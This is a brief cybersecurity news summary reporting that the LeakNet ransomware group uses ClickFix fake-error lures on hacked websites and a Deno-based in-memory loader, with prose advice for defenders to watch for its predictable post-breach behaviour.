The ransomware group LeakNet is now using the ClickFix social engineering technique to gain initial access by tricking users on compromised websites into executing malicious commands. This shift toward self-managed access methods reduces their reliance on external brokers and uses a JavaScript-based loader to run payloads directly in memory.
The LeakNet ransomware operation has recently updated its tactics by incorporating the ClickFix social engineering method to breach target networks. This approach involves compromising legitimate websites to display fake error messages or CAPTCHA prompts that trick visitors into manually running malicious commands. By convincing users that they are fixing a routine technical issue, the attackers bypass traditional security hurdles and gain a foothold on the victim's system without needing to purchase stolen credentials from external brokers.
This transition marks a significant strategic change for the group, which first appeared in late 2024 under the guise of a digital watchdog focused on transparency. By managing their own initial access through ClickFix, LeakNet lowers its operational costs and avoids the delays associated with waiting for high-value accounts to become available on the underground market. The campaign is not limited to any specific industry, as the group is currently casting a wide net to maximize the number of potential infections across various sectors.
Technically, these attacks are notable for their use of a staged command and control loader built on the Deno JavaScript runtime. This specific configuration allows the group to execute malicious payloads directly within a system’s memory, making the activity harder for traditional antivirus software to detect. Once the initial breach is successful, the attackers follow a consistent post-exploitation sequence that remains the same regardless of how they first entered the network.
The effectiveness of ClickFix lies in its ability to abuse trusted, everyday computer workflows. Because the tactic instructs users to use legitimate Windows tools like the Run dialog to execute commands, the process often feels safe and routine to an average employee. This exploitation of human trust allows the group to bypass many automated defenses that are designed to stop more traditional malware delivery methods like email attachments or software vulnerabilities.
Despite these evolving entry methods, security researchers emphasize that the group’s behavior following the initial breach remains predictable. Because LeakNet follows a repeatable pattern of movement and data exfiltration once inside a network, defenders can focus on identifying these specific post-exploitation signatures. By detecting these known behaviors in the middle stages of an attack, organizations have a better chance of disrupting the operation before any ransomware is actually deployed.
Source: LeakNet Ransomware Leverages ClickFix on Hacked Sites to Deploy Deno Loader